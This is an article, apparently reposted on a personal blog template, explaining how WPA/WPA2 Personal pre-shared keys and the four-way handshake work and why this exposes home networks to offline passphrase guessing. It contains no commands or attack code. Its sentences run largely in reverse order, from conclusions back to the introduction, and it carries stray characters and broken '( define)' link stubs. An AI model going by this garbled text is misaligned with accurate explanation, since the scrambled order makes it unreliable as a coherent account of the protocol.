What value do they both know? The PSK, of course. However, in WLANs using WPA-Personal or WPA2-Personal, there’s no 802.1X, so the station and AP must use a value they both already know. In WLANs that use WPA-Enterprise or WPA2-Enterprise, every session starts from a different PMK, delivered during 802.1X authentication. End users may not be aware of this handshake - and administrators may not really care about all of these gory details.īut WPA PSK crackers do. It also occurs periodically thereafter, whenever the AP decides to refresh transient keys. This four-way handshake occurs whenever you connect to a WLAN using WPA or WPA2. Each MIC is generated by hashing a specified part of the message, then encrypting that hash with the PTK. To stop these handshake messages from being forged, messages #2 through #4 carry a Message Integrity Code (MIC).To prevent eavesdropping, the GTK is encrypted with the PTK. Because every station on the WLAN needs that same GTK to decrypt broadcast/multicast frames, the AP sends the current GTK in message #3 of the handshake. The AP also generates a Group Transient Key (GTK) to protect all broadcast and multicast communication.Messages #1 and #2 in the figure above show how the AP and station manage to derive the same PTK without ever sending it over the air. To derive a different PTK for each AP/station combo, a Pairwise Master Key (PMK) is fed into an algorithm, along with MAC address ( define) and two values, ANonce and SNonce. The AP and each station need an individual Pairwise Transient Key (PTK) to protect unicast communication between them.What is actually happening during this handshake? The handshake must be completed before any encrypted data can actually be exchanged between this station and AP. After authentication (if any), the AP kicks off a four-way handshake (see figure below) to derive the keys for this session. The AP or station has the option to start 802.1X authentication, exchanging Extensible Authentication Protocol (EAP) ( define) messages to verify user/server identities. When using WPA or WPA2, every station is permitted to associate with the AP. That PSK is usually generated by combining the WLAN’s name (Service Set Identifier, SSID) ( define) with a passphrase (an ASCII ( define) string, 8-63 characters.) If you have ever used Windows XP to connect to a WPA-Personal WLAN, you have been prompted to enter a WPA passphrase. Let’s Shake on ItĪ PSK is a 256-bit value, known to every device in the WLAN. Once an outsider has the PSK, he can steal service or decrypt data sent by legitimate users on your network. Unfortunately, the way in which WPA/WPA2 encryption keys are generated and delivered makes it easy for an attacker to try to guess your WLAN’s PSK. (For how to set up WPA at home, see WPA-PSK: Step-by-Step.) But, unlike those old WEP keys, PSKs are not encryption keys - they are the starting point for deriving per-station (client) encryption keys. Known as WPA-PSK, WPA-Personal or WPA2 Personal, this approach authenticates everyone using the WLAN with the same secret passphrase, configured into the Access Point (AP). Since home networks don’t generally have RADIUS servers, a simpler option also exists: Pre-Shared Keys (PSKs). While that doesn’t make key cracking completely impossible, it substantially reduces that risk. Every new session gets its own fresh random key, used for a relatively short time. Known as WPA-Enterprise or WPA2-Enterprise, this approach was designed for business networks with the staff and resources required to support RADIUS-based authentication. WPA and WPA2 are best when used with 802.1X Port Access Control for per-user authentication and per-session key delivery. The encryption keys upon which they depend must never be disclosed to outsiders. The first version of WPA patched around mistakes in the old, broken Wired Equivalent Privacy (WEP), while WPA2 started from a clean slate to deliver more robust, efficient security.Įither version of WPA can stop wireless eavesdropping - with one big caveat. Wi-Fi Protected Access (WPA) protects wireless data by applying encryption, integrity checks, and sequencing. Think Wi-Fi Protected Access makes your home or small business network impenetrable? Think again - and learn how to protect yourself.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |